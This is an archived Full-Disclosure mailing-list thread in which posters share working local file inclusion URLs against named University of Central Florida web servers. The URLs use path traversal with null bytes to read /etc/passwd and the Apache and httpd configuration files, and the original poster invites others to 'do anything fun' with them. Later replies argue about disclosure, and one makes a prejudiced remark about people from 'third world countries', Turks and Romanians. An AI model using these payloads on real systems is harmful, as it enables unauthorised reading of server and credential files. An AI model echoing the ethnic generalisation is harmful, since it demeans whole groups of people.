Re: University of Central Florida Multiple LFI

[Eyeballing Weev <eyeballing.weev () gmail com>]

Might as well register a new email account too because "hacktalkblog" is 
just as obvious as posting a link to your site. I hope UCF calls FDLE 
and you can explain to Special Agent Veazy and others about your "research"

On 02/19/2011 12:04 PM, Hack Talk wrote:
> I actually live close to the University of Central Florida and after
> countless attempt to contact both their infosec team, the "tech
> rangers", and their personal web developers with no contact back or
> patching of these vulnerabilities I decided to post these up on FD.
> There are still many, _many_ more vulnerabilities which I have yet to
> disclose as I'm still giving them a chance to patch them.
>
> Also, I usually remove my website from the email as it's part of my
> standard email signature, guess I just couldn't be bothered to do it
> when I sent in this vulnerability. I'll be sure to be better about
> removing it so people aren't so butthurt.
>
>
> Luis Santana
>
>
>
> On Sat, Feb 19, 2011 at 11:48 AM, Eyeballing Weev
> <eyeballing.weev () gmail com <mailto:eyeballing.weev () gmail com>> wrote:
>
>     Madhur Ahuja and "Hack Talk" are obviously from third world countries
>     and are only doing this for publicity, much like how Turks and Romanians
>     "hack" into websites for defacement purposes. Same concept just applied
>     differently.
>
>     On 02/19/2011 11:45 AM, Shawn Merdinger wrote:
>      > Hi,
>      >
>      > At the risk of being ridiculed here, I'll point out that UCF does
>     have
>      > a Infosec office and a incident response POC.
>      >
>      > https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx
>      > sirt () mail ucf edu <mailto:sirt () mail ucf edu>
>      >
>      > fwiw, security folks in .edus are at the low-end of this industry's
>      > pay-scale and it's difficult to find/retain qualified people, not to
>      > mention adequate budget for purchasing (even more) crappy security
>      > products and almost no budget for professional development like
>      > training and conferences.
>      >
>      > I would expect there are more challenging targets out there, were one
>      > inclined...
>      >
>      > Cheers,
>      > --scm
>      >
>      >
>      > On Sat, Feb 19, 2011 at 06:04, Madhur
>     Ahuja<ahuja.madhur () gmail com <mailto:ahuja.madhur () gmail com>>  wrote:
>      >>
>     http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>      >>
>      >> On Sat, Feb 19, 2011 at 11:38 AM, Hack
>     Talk<hacktalkblog () gmail com <mailto:hacktalkblog () gmail com>>  wrote:
>      >>>
>      >>> Found these and thought I'd share:
>      >>>
>      >>> -==================-
>      >>>
>      >>>
>     
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>      >>>
>      >>>
>     
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>      >>> -==================-
>      >>> Let me know if you do anything fun with 'em
>      >>>
>      >>> Luis Santana - Security+
>      >>> Administrator - http://hacktalk.net
>      >>> HackTalk Security - Security From The Underground
>      >>>
>      >
>      > _______________________________________________
>      > Full-Disclosure - We believe in it.
>      > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>      > Hosted and sponsored by Secunia - http://secunia.com/
>
>     _______________________________________________
>     Full-Disclosure - We believe in it.
>     Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>     Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/